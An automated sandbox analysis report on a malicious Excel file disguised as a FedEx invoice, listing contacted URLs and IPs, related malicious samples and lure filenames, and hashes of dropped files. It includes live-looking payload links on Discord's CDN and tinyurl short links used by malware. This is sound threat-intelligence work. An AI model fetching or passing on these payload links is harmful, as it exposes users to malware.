http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	o.exe, 0000000E.00000002.394765913.00000000050D1000.00000004.00000001.sdmp, o.exe, 00000010.00000002.396533915.0000000005451000.00000004.00000001.sdmp, o.exe, 00000011.00000002.421442532.00000000046D1000.00000004.00000001.sdmp	false		high
https://ecs.office.com/config/v2/Office	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://graph.ppe.windows.net	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://res.getmicrosoftkey.com/api/redemptionevents	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://powerlift-frontdesk.acompli.net	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://tasks.office.com	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://officeci.azurewebsites.net/api/	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false	Avira URL Cloud: safe	unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://store.office.cn/addinstemplate	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://tinyurl.com4	o.exe, 0000000E.00000002.396745750.0000000005507000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	o.exe, 00000011.00000002.422182443.0000000004814000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://wus2-000.pagecontentsync.	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	o.exe, 00000011.00000002.422182443.0000000004814000.00000004.00000001.sdmp	false		high
https://outlook.office.com/autosuggest/api/v1/init?cvid=	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://globaldisco.crm.dynamics.com	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
http://ocsp.comodoca4.com0	o.exe, 0000000E.00000002.397102054.000000000554E000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://store.officeppe.com/addinstemplate	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dev0-api.acompli.net/autodetect	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://cdn.discordapp.com/attachments/770629131393	o.exe, 0000000E.00000002.396819235.0000000005518000.00000004.00000001.sdmp	false		high
https://www.odwebp.svc.ms	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.powerbi.com/v1.0/myorg/groups	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://web.microsoftstream.com/video/	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://graph.windows.net	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://dataservice.o365filtering.com/	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://github.com/Pester/Pester	o.exe, 00000011.00000002.422182443.0000000004814000.00000004.00000001.sdmp	false		high
https://officesetup.getmicrosoftkey.com	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://analysis.windows.net/powerbi/api	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
http://www.carterandcone.coml	vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://prod-global-autodetect.acompli.net/autodetect	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	false		high
https://outlook.office365.com/autodiscover/autodiscover.json	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
http://weather.service.msn.com/data.aspx	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://apis.live.net/v5.0/	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://management.azure.com	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://outlook.office365.com	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
http://www.fontbureau.com/designersG	vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	false		high
https://incidents.diagnostics.office.com	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
http://www.fontbureau.com/designers/?	vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/ios	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
http://www.fontbureau.com/designers?	vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	false		high
https://insertmedia.bing.office.net/odc/insertmedia	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://o365auditrealtimeingestion.manage.office.com	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
http://crt.comodoca4.com/COMODORSADomainValidationSecureServerCA2.crt0%	o.exe, 0000000E.00000002.397102054.000000000554E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://api.office.net	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://incidents.diagnosticssdf.office.com	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://github.com/Pester/Pesterd	o.exe, 0000000E.00000002.395218460.0000000005212000.00000004.00000001.sdmp	false		high
http://www.tiro.com	vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://asgsmsproxyapi.azurewebsites.net/	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false	Avira URL Cloud: safe	unknown
https://clients.config.office.net/user/v1.0/android/policies	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://entitlement.diagnostics.office.com	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
http://www.goodfont.co.kr	vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://autodiscover-s.outlook.com	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://storage.live.com/clientlogs/uploadlocation	32F10499-3ABF-4CE4-A624-F22D1B8584B0.0.dr	false		high
https://cdn.discordapp.com4	o.exe, 0000000E.00000002.397009866.000000000553A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.typography.netD	vc.exe, 00000020.00000002.533447830.0000000006BD2000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
162.159.129.233	unknown	United States		13335	CLOUDFLARENETUS	false
104.20.138.65	unknown	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	320331
Start date:	19.11.2020
Start time:	09:28:51
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 7s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	1099008FEDEX_090887766.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	37
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal96.troj.expl.evad.winXLS@31/25@2/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 2.3% (good quality ratio 1.9%) Quality average: 61% Quality standard deviation: 35.6%
HCA Information:	Successful, ratio: 90% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Changed system and user locale, location and keyboard layout to French - France Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 104.42.151.234, 13.88.21.125, 52.255.188.83, 52.109.76.6, 52.109.88.39, 52.109.8.22, 23.54.113.104, 51.104.139.180, 23.0.174.200, 23.0.174.185, 20.54.26.129, 23.10.249.43, 23.10.249.26 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, skypedataprdcoleus17.cloudapp.net, config.officeapps.live.com, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/320331/sample/1099008FEDEX_090887766.xls

Simulations

Behavior and APIs

Time	Type	Description
09:32:32	API Interceptor	253x Sleep call for process: o.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
162.159.129.233	ENQ-015August 2020 R1 Proj LOT.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/722888184203051118/757862128198877274/Stub.jpg
104.20.138.65	1099008FEDEX_090887766.xls	Get hash	malicious	Browse
	SIN029088.xls	Get hash	malicious	Browse
	https://tinyurl.com/y5tjuap2	Get hash	malicious	Browse
	SMBS PO 30 quotation.xls	Get hash	malicious	Browse
	viaseating-666114_xls.HtMl	Get hash	malicious	Browse
	https://tinyurl.com/venmosupp	Get hash	malicious	Browse
	tetratech-907745_xls.HtMl	Get hash	malicious	Browse
	Waybill Invoice.xls	Get hash	malicious	Browse
	Waybill Invoice.xls	Get hash	malicious	Browse
	Overdue Payments.xls	Get hash	malicious	Browse
	ciechgroup-551288_xls.HtMl	Get hash	malicious	Browse
	OVERDUE INVOICE.xls	Get hash	malicious	Browse
	https://tinyurl.com/y5gq29fv	Get hash	malicious	Browse
	Quote Request October-2020.xls	Get hash	malicious	Browse
	https://tinyurl.com/y6484eaq	Get hash	malicious	Browse
	PROFORMA INVOICE INV-1.xls	Get hash	malicious	Browse
	https://naset.ocry.com/#astrid.bulder@rivm.nl	Get hash	malicious	Browse
	RFQ-SSM-RFQ 6682Q.xls	Get hash	malicious	Browse
	https://l.facebook.com/l.php?u=https%3A%2F%2Ftinyurl.com%2Fy3da9xbq%3Ffbclid%3DIwAR11jNtpFJqmHsfB6MuN4oB-gl7-RlVZqSgYIbmZW4ycJwtQ-tC85PzgLO4&h=AT1i9PU8X_itDVqe5yg4Afn5zFPp0KVwni5sQg-Oc5Yor7a-8EWrOl11b-y21X_Oi92_H_jMhPiEjm3aKUnMEib9p96Fuptgd9vraABiOS8AO8X86OxcPZyET7VlHYnKBg&__tn__=H-R&c[0]=AT26jLdBW-b9efDmUD2-IVQDmvnfjC8zMcJVpGrmXtfU07ZmaRqvjC3hcq86tiO8rGqmY2DrakboCaPRMLQtsl2m1yZfExawqplv_zZwazNNYlc2wsoaV6LvzXDEPrWYoMbJFnx7l8Qm7vznPPnkddWEuQ	Get hash	malicious	Browse
	https://tinyurl.com/yye5b9wx	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
cdn.discordapp.com	1099008FEDEX_090887766.xls	Get hash	malicious	Browse	162.159.134.233
	PO#0007507_009389283882873PDF.exe	Get hash	malicious	Browse	162.159.135.233
	9Pimjl3jyq.exe	Get hash	malicious	Browse	162.159.133.233
	D6vy84I7rJ.exe	Get hash	malicious	Browse	162.159.135.233
	Payment copy.doc	Get hash	malicious	Browse	162.159.129.233
	RFQ for TRANS ANATOLIAN NATURAL GAS PIPELINE (TANAP) - PHASE 1(Package 2).exe	Get hash	malicious	Browse	162.159.133.233
	d6pj421rXA.exe	Get hash	malicious	Browse	162.159.130.233
	LAX28102020HBL_AMSLAX1056_CTLQD06J0BL_PO_DTH266278_RFQ.exe	Get hash	malicious	Browse	162.159.134.233
	LAX28102020HBL_AMSLAX1056_CTLQD06J0BL_PO_DTH266278_RFQ.exe	Get hash	malicious	Browse	162.159.134.233
	Order_Request_Retail_20-11691-AB.xlsx	Get hash	malicious	Browse	162.159.130.233
	http://cdn.discordapp.com/attachments/776234221668270104/776349109195898880/AWB_DHL733918737WA56301224799546260.pdf.7z	Get hash	malicious	Browse	162.159.134.233
	89BR0suQeS.exe	Get hash	malicious	Browse	162.159.133.233
	89BR0suQeS.exe	Get hash	malicious	Browse	162.159.133.233
	RBBD5vivZc.exe	Get hash	malicious	Browse	162.159.130.233
	S01NwVhW5A.exe	Get hash	malicious	Browse	162.159.133.233
	qelMUH5CPF.exe	Get hash	malicious	Browse	162.159.134.233
	o9Fr4K1qcu.exe	Get hash	malicious	Browse	162.159.135.233
	SecuriteInfo.com.Trojan.Siggen10.63473.17852.exe	Get hash	malicious	Browse	162.159.130.233
	IMG_P_O_RFQ-WSB_17025-ENd User-Evaluate.exe	Get hash	malicious	Browse	162.159.130.233
	GuYXnzIH45.exe	Get hash	malicious	Browse	162.159.130.233
tinyurl.com	SIN029088.xls	Get hash	malicious	Browse	104.20.139.65
	SIN029088.xls	Get hash	malicious	Browse	104.20.138.65
	https://tinyurl.com/y5tjuap2	Get hash	malicious	Browse	104.20.138.65
	SMBS PO 30 quotation.xls	Get hash	malicious	Browse	104.20.138.65
	https://tinyurl.com/y5tjuap2	Get hash	malicious	Browse	104.20.139.65
	http://tinyurl.com	Get hash	malicious	Browse	104.20.139.65
	viaseating-666114_xls.HtMl	Get hash	malicious	Browse	104.20.138.65
	https://tinyurl.com/venmosupp	Get hash	malicious	Browse	104.20.138.65
	WayBill Invoice.xls	Get hash	malicious	Browse	172.67.1.225
	WayBill Invoice.xls	Get hash	malicious	Browse	104.20.139.65
	WayBill Invoice.xls	Get hash	malicious	Browse	104.20.139.65
	tetratech-907745_xls.HtMl	Get hash	malicious	Browse	104.20.138.65
	Waybill Invoice.xls	Get hash	malicious	Browse	104.20.138.65
	Waybill Invoice.xls	Get hash	malicious	Browse	172.67.1.225
	Waybill Invoice.xls	Get hash	malicious	Browse	104.20.138.65
	rooney-eng-598583_xls.HtMl	Get hash	malicious	Browse	104.20.139.65
	Overdue Payments.xls	Get hash	malicious	Browse	172.67.1.225
	Overdue Payments.xls	Get hash	malicious	Browse	104.20.138.65
	New PO 9380.xls	Get hash	malicious	Browse	104.20.139.65

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	https://akljsdhfas.selz.com/?	Get hash	malicious	Browse	104.18.108.36
	quotation_0087210_pdf.exe	Get hash	malicious	Browse	172.67.188.154
	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	104.24.105.107
	1099008FEDEX_090887766.xls	Get hash	malicious	Browse	162.159.134.233
	INQUIRY.exe	Get hash	malicious	Browse	104.27.152.230
	PO Quotation.jar	Get hash	malicious	Browse	104.20.22.46
	doc2227740.xls	Get hash	malicious	Browse	104.27.172.15
	PO Quotation.jar	Get hash	malicious	Browse	104.20.23.46
	doc2227740.xls	Get hash	malicious	Browse	104.27.173.15
	TRIAL-ORDER.exe	Get hash	malicious	Browse	104.18.57.249
	d11311145.xls	Get hash	malicious	Browse	104.27.173.15
	23692 ANRITSU PROBE po 29288.exe	Get hash	malicious	Browse	104.23.99.190
	d11311145.xls	Get hash	malicious	Browse	104.27.173.15
	PO #5618896.gz.exe	Get hash	malicious	Browse	104.23.98.190
	PO#0007507_009389283882873PDF.exe	Get hash	malicious	Browse	162.159.134.233
	07DYwxlVm4.exe	Get hash	malicious	Browse	104.27.133.115
	9Pimjl3jyq.exe	Get hash	malicious	Browse	162.159.133.233
	af4db3a6b648b585f8e11b9ff5be73f2.exe	Get hash	malicious	Browse	104.27.133.115
	af4db3a6b648b585f8e11b9ff5be73f2.exe	Get hash	malicious	Browse	104.27.133.115
	https://www.vedansha.com/doc/office/LatestLOGOOfficeEncoded/LatestLOGOOfficeEncoded/RedirectPage/marc.loney@navitas.com	Get hash	malicious	Browse	172.67.38.66
CLOUDFLARENETUS	https://akljsdhfas.selz.com/?	Get hash	malicious	Browse	104.18.108.36
	quotation_0087210_pdf.exe	Get hash	malicious	Browse	172.67.188.154
	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	104.24.105.107
	1099008FEDEX_090887766.xls	Get hash	malicious	Browse	162.159.134.233
	INQUIRY.exe	Get hash	malicious	Browse	104.27.152.230
	PO Quotation.jar	Get hash	malicious	Browse	104.20.22.46
	doc2227740.xls	Get hash	malicious	Browse	104.27.172.15
	PO Quotation.jar	Get hash	malicious	Browse	104.20.23.46
	doc2227740.xls	Get hash	malicious	Browse	104.27.173.15
	TRIAL-ORDER.exe	Get hash	malicious	Browse	104.18.57.249
	d11311145.xls	Get hash	malicious	Browse	104.27.173.15
	23692 ANRITSU PROBE po 29288.exe	Get hash	malicious	Browse	104.23.99.190
	d11311145.xls	Get hash	malicious	Browse	104.27.173.15
	PO #5618896.gz.exe	Get hash	malicious	Browse	104.23.98.190
	PO#0007507_009389283882873PDF.exe	Get hash	malicious	Browse	162.159.134.233
	07DYwxlVm4.exe	Get hash	malicious	Browse	104.27.133.115
	9Pimjl3jyq.exe	Get hash	malicious	Browse	162.159.133.233
	af4db3a6b648b585f8e11b9ff5be73f2.exe	Get hash	malicious	Browse	104.27.133.115
	af4db3a6b648b585f8e11b9ff5be73f2.exe	Get hash	malicious	Browse	104.27.133.115
	https://www.vedansha.com/doc/office/LatestLOGOOfficeEncoded/LatestLOGOOfficeEncoded/RedirectPage/marc.loney@navitas.com	Get hash	malicious	Browse	172.67.38.66

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	quotation_0087210_pdf.exe	Get hash	malicious	Browse	162.159.129.233 104.20.138.65
	23692 ANRITSU PROBE po 29288.exe	Get hash	malicious	Browse	162.159.129.233 104.20.138.65
	PO #5618896.gz.exe	Get hash	malicious	Browse	162.159.129.233 104.20.138.65
	bGtm3bQKUj.exe	Get hash	malicious	Browse	162.159.129.233 104.20.138.65
	https://greatdownloadplace.net/estate/formated/xlsc/Setup_v177.exe	Get hash	malicious	Browse	162.159.129.233 104.20.138.65
	BlueJeansInstaller.exe	Get hash	malicious	Browse	162.159.129.233 104.20.138.65
	JmuEmJ4T4r5bc8S.exe	Get hash	malicious	Browse	162.159.129.233 104.20.138.65
	List Of Orders.exe	Get hash	malicious	Browse	162.159.129.233 104.20.138.65
	Status____201711.gz.exe	Get hash	malicious	Browse	162.159.129.233 104.20.138.65
	Documento relativo al carico e alla spedizione del cliente_italy2020.exe	Get hash	malicious	Browse	162.159.129.233 104.20.138.65
	b095b966805abb7df4ffddf183def880.exe	Get hash	malicious	Browse	162.159.129.233 104.20.138.65
	SIN029088.xls	Get hash	malicious	Browse	162.159.129.233 104.20.138.65
	Request for Quote_PDF.vbs	Get hash	malicious	Browse	162.159.129.233 104.20.138.65
	01_file.exe	Get hash	malicious	Browse	162.159.129.233 104.20.138.65
	aguhvLvn.exe	Get hash	malicious	Browse	162.159.129.233 104.20.138.65
	BlueJeans.2.25.11u.msi	Get hash	malicious	Browse	162.159.129.233 104.20.138.65
	2B027105A0C3.exe	Get hash	malicious	Browse	162.159.129.233 104.20.138.65
	SecuriteInfo.com.Trojan.GenericKD.35249420.21118.xlsm	Get hash	malicious	Browse	162.159.129.233 104.20.138.65
	SecuriteInfo.com.VBA.Heur2.SCrypted.3.D72DA639.Gen.14177.xlsm	Get hash	malicious	Browse	162.159.129.233 104.20.138.65
	SecuriteInfo.com.VBA.Heur2.SCrypted.3.D72DA639.Gen.16832.xlsm	Get hash	malicious	Browse	162.159.129.233 104.20.138.65

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\powershell.exe	docCGLRRT67L45F205V.vbs	Get hash	malicious	Browse
	docBRTNMR51L69G006Q.vbs	Get hash	malicious	Browse
	Allegato_doc_03141330161.vbs	Get hash	malicious	Browse
	Allegato_doc_04198100168.vbs	Get hash	malicious	Browse
	Allegato_doc_03675480267.vbs	Get hash	malicious	Browse
	Allegato_doc_02044200042.vbs	Get hash	malicious	Browse
	Allegato_doc_TMSRLL61M43B796B.vbs	Get hash	malicious	Browse
	Allegato_doc_BRNLSN65H44H501N.vbs	Get hash	malicious	Browse
	Allegato_doc_03587420286.vbs	Get hash	malicious	Browse
	Allegato_doc_03455910780.vbs	Get hash	malicious	Browse
	Allegato_doc_01555200441.vbs	Get hash	malicious	Browse
	Allegato_doc_07501560150.vbs	Get hash	malicious	Browse
	Allegato_doc_01578300210.vbs	Get hash	malicious	Browse
	sload.vbs	Get hash	malicious	Browse
	sload (2).vbs	Get hash	malicious	Browse
	Allegato_doc_02298410644.vbs	Get hash	malicious	Browse
	Allegato.vbs	Get hash	malicious	Browse
	Fatt_cliente_02567110412.vbs	Get hash	malicious	Browse
	FattDiffEmessa2020 VNZMSM75H27B201Q.vbs	Get hash	malicious	Browse
	FattDiffEmessa2020 01170200339.vbs	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\o.exe.log Download File
Process:	C:\Users\user\AppData\Local\Temp\o.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1837
Entropy (8bit):	5.313122446763076
Encrypted:	false
SSDEEP:	48:MgzeyHKXwYHKhQnoRAHKzvUHKLHAHbHKntHoxHw0vmHKoOXIHj:lrqXwYqhQnouqzsqLg7qntIxHwzqo0ID
MD5:	5E7F085B0ABD64EE705C194B20076820
SHA1:	F01F15FFF585A2EE10EF3992C919E8E210BB4FB9
SHA-256:	04C946A4CC944EBB26734C936D62F3F073D5BB8F3AC748BDBE7C8C42BAD00DCB
SHA-512:	35E701CA2289813FA3F0971C6701A3CDB5C4D4B56724439288CDB6B4BD95613D92E9D4393144077A930E57D7D1D65D9D86E92884F3030F4DF4CC95BBEB84C60E
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.PowerShell.ConsoleHost, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..2,"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.Numerics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.DirectoryServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\32F10499-3ABF-4CE4-A624-F22D1B8584B0 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	129952
Entropy (8bit):	5.378343270999592
Encrypted:	false
SSDEEP:	1536:OcQceNWiA3gZwLpQ9DQW+zAUH34ZldpKWXboOilXPErLL8TT:MmQ9DQW+zBX8u
MD5:	D6E83EE170442AF09B8BCF073B59768C
SHA1:	5949B8723FE09F95EDCAF2C21BF3C5E607FC5B00
SHA-256:	A78BA071721C5ED90A800C7A60B917AAE4BCEB9E5048296C22554DAFE2EF5166
SHA-512:	81105DAF2AEB829E768161AA1111F141A3AC69345A0A56C72B153C602876E17E0F49B2DC996C66730DC97F3CB068496B8A9987B6D09DA0C09021038D072D0EE3
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2020-11-19T08:31:44">.. Build: 16.0.13517.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Users\user\AppData\Local\Temp\o.exe
File Type:	data
Category:	dropped
Size (bytes):	5829
Entropy (8bit):	4.8968676994158
Encrypted:	false
SSDEEP:	96:WCJ2Woe5o2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXx9smyFRLcU6f:5xoe5oVsm5emd0gkjDt4iWN3yBGHh9s6
MD5:	36DE9155D6C265A1DE62A448F3B5B66E
SHA1:	02D21946CBDD01860A0DE38D7EEC6CDE3A964FC3
SHA-256:	8BA38D55AA8F1E4F959E7223FDF653ABB9BE5B8B5DE9D116604E1ABB371C1C87
